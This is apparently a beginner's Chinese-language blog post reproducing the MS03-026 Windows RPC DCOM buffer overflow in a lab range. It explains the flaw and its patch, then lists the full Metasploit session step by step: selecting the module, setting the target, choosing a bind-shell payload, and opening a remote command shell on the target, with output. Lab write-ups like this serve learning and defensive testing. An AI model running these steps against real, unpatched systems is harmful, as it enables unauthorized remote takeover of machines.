【小白学习记】漏洞复现验证篇-MS03-026

2quanCA11

已于 2024-06-10 01:40:36 修改

阅读量894

点赞数 26

文章标签：学习 web安全网络安全运维 linux

于 2024-06-10 00:28:10 首次发布

本文链接：https://blog.csdn.net/BeCareful0/article/details/139566301

版权

环境

红日靶场：ATT&CK红队评估01 - win2k3 192.168.52.141
攻击机：32位 kali 172.24.4.7
已做内网流量转发

MS03-026复现过程

漏洞介绍

MS03-026是一个影响多个版本的Microsoft Windows操作系统的远程可利用缓冲区溢出漏洞。该漏洞存在于RPC接口中，具体是Distributed Component Object Model (DCOM)接口的实现部分。这个漏洞允许攻击者在目标主机上执行恶意代码。

漏洞的实质是，在处理通过TCP/IP进行信息交换时，RPC部分存在问题，远程攻击者可以利用这个漏洞以本地系统权限在系统上执行任意指令。具体来说，这个漏洞影响的是使用RPC的DCOM接口，该接口处理由客户端机器发送给服务器的DCOM对象激活请求（如UNC路径）。攻击者通过向目标发送畸形RPC DCOM请求来利用这个漏洞。

此外，已知有一系列的蠕虫（如Blaster）在野外利用了这个漏洞。为了防御这个漏洞，建议重新连接系统到网络并应用MS03-026中提到的补丁。此外，可以根据站点需求禁用DCOM，这也是一种防御措施。

总结来说，MS03-026是一个严重的安全漏洞，它允许攻击者远程执行代码。为了保护系统，需要及时应用补丁和采取其他防御措施，如禁用DCOM等。

执行命令：msfconsole

┌──(kali㉿kali)-[~]
└─$ msfconsole 
Metasploit tip: View missing module options with show missing
                                                  
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v6.4.9-dev                           ]
+ -- --=[ 2420 exploits - 1248 auxiliary - 423 post       ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

执行命令：search ms03-026

msf6 > search ms03-026

Matching Modules
================

   #  Name                                  Disclosure Date  Rank   Check  Description
   -  ----                                  ---------------  ----   -----  -----------
   0  exploit/windows/dcerpc/ms03_026_dcom  2003-07-16       great  Yes    MS03-026 Microsoft RPC DCOM Interface Overflow


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/dcerpc/ms03_026_dcom

执行命令：use 0 或 use exploit/windows/dcerpc/ms03_026_dcom

msf6 > use 0
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) >

执行命令：set rhost 192.168.52.141

msf6 exploit(windows/dcerpc/ms03_026_dcom) > set rhost 192.168.52.141
rhost => 192.168.52.141

执行命令：set lhost 172.24.4.7

msf6 exploit(windows/dcerpc/ms03_026_dcom) > set lhost 172.24.4.7
lhost => 172.24.4.7

执行命令：set payload generic/shell_bind_tcp

msf6 exploit(windows/dcerpc/ms03_026_dcom) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp

执行命令：show options

msf6 exploit(windows/dcerpc/ms03_026_dcom) > show options 

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.52.141   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/
                                      using-metasploit.html
   RPORT   135              yes       The target port (TCP)


Payload options (generic/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.52.141   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal



View the full module info with the info, or info -d command.

执行命令：exploit 或 run

msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit 

[*] 192.168.52.141:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.52.141:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.52.141[135] ...
[*] 192.168.52.141:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Started bind TCP handler against 192.168.52.141:4444
[*] Command shell session 1 opened (172.24.4.7:34395 -> 192.168.52.141:4444) at 2024-06-09 12:23:25 -0400


Shell Banner:
Microsoft Windows [Version 5.2.3790]
-----
          

C:\WINDOWS\system32>ipconfig                            
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 192.168.52.141
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.52.2

反弹shell成功
PS：仅学习，有什么不对请各位大大斧正

请确保在使用这些技术时，您有权这么做，并且您的行为符合法律法规和道德准则。这些信息仅供教育和研究目的使用。

2quanCA11

关注

26
点赞
踩
14

收藏

觉得还不错? 一键收藏
1
评论
【小白学习记】漏洞复现验证篇-MS03-026

本文详细记录了MS03-026漏洞的复现过程，这是一个影响早期Windows操作系统的严重RPC DCOM接口缓冲区溢出漏洞。文章首先介绍了漏洞背景，然后通过在Kali Linux攻击机上使用Metasploit框架，执行了一系列命令来搜索、配置并利用该漏洞。成功利用后，攻击者获得了目标系统的反弹Shell，演示了漏洞的实际危害。
复制链接

扫一扫